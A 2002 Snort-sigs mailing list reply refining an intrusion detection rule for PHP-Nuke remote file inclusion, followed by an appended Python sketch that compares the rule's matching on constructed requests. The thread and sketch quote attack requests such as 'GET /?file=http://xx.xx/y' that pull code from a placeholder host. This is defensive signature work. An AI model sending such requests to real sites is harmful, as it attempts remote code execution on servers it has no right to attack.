[Snort-sigs] PHPNuke rule
bmc at ...95...
Fri Jan 18 22:55:01 EST 2002
On Fri, Jan 18, 2002 at 08:00:00PM +0800, Michael Boman wrote:
> alert TCP $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"PHP-Nuke remote loading of PHP files exploit"; uricontent:"/index.php?file=http"; nocase; dsize: >24; flags: A+; classtype:web-application-attack;)
> Why dsize: >24 ?
> Smallest GET request I could think of is:
> GET /?file=http://xx.xx/y
Your signature is false negative. You require "index.php", but in your example
you use /.
Also, PHP transparently handles GET/POST. Since it does, you can't expect
"?file=http" in an attempt, only "file=http".
Also, does anyone know if PHP will download things via other protocols? I
suspect it will download via FTP as well, but I don't have it installed
When I get to a place where I can do a CVS commit, I'll be adding a
modified version of this sig in experimental.rules with SID of 1399.
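As an added illustration, not part of the thread, the following Python sketch contrasts the posted rule's URI-only matching (`/index.php?file=http`) with the broader `file=http` check bmc describes, applied to both the query string and a POST body. It is run over constructed HTTP requests, including Boman's `/?file=http://xx.xx/y` example; the request samples, function names and the `len(raw)` stand-in for Snort's `dsize` are this example's own assumptions.

```python
"""Compare the posted PHP-Nuke rule's matching logic with the broadened
form discussed in the thread: look for "file=http" anywhere a request
parameter can travel, not only for "/index.php?file=http" in the URI.

All request samples below are constructed for this example, not captured traffic.
"""
import re
from urllib.parse import unquote

# What the original signature effectively requires, URI only (nocase).
ORIGINAL_URI_PATTERN = re.compile(r"/index\.php\?file=http", re.IGNORECASE)

# Broadened check: a "file" parameter whose value starts with "http",
# at the start of the parameter string or after a '?' / '&' separator.
BROAD_PATTERN = re.compile(r"(?:^|[?&])file=http", re.IGNORECASE)


def split_request(raw: bytes):
    """Return (method, uri, body) from a raw HTTP/1.x request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    method, uri, _version = request_line.split(" ", 2)
    return method, uri, body.decode("latin-1")


def original_rule_matches(raw: bytes) -> bool:
    """Mimic the posted rule: uricontent on the request URI, dsize > 24.

    len(raw) stands in for Snort's dsize here (an approximation for this
    example; real dsize is the TCP payload length of one packet)."""
    _method, uri, _body = split_request(raw)
    return len(raw) > 24 and ORIGINAL_URI_PATTERN.search(uri) is not None


def broad_rule_matches(raw: bytes) -> bool:
    """Check the query string and, for POST, the URL-encoded body as well,
    since PHP exposes GET and POST parameters the same way."""
    method, uri, body = split_request(raw)
    query = uri.partition("?")[2]
    candidates = [unquote(query)]
    if method.upper() == "POST":
        candidates.append(unquote(body))
    return any(BROAD_PATTERN.search(c) for c in candidates)


# Constructed samples (hypothetical host "h", placeholder URL xx.xx/y).
SAMPLES = {
    # The case the posted rule was written for.
    "index_get": b"GET /index.php?file=http://xx.xx/y HTTP/1.0\r\nHost: h\r\n\r\n",
    # Boman's minimal request: no "index.php" in the URI.
    "short_get": b"GET /?file=http://xx.xx/y HTTP/1.0\r\nHost: h\r\n\r\n",
    # Same parameter carried in a POST body instead of the query string.
    "post_body": (
        b"POST /index.php HTTP/1.0\r\nHost: h\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n"
        b"Content-Length: 22\r\n\r\n"
        b"file=http://xx.xx/y&a="
    ),
    # Ordinary local include; neither check should fire.
    "benign": b"GET /index.php?file=about HTTP/1.0\r\nHost: h\r\n\r\n",
}


def compare() -> dict:
    """Map each sample name to (original_rule_fires, broad_rule_fires)."""
    return {
        name: (original_rule_matches(raw), broad_rule_matches(raw))
        for name, raw in SAMPLES.items()
    }


if __name__ == "__main__":
    for name, (orig, broad) in compare().items():
        print(f"{name:10s} original={orig!s:5s} broadened={broad}")
```

The two false negatives bmc points out show up as `short_get` and `post_body`: the posted rule misses both, the broadened check catches both, and the benign local include fires neither.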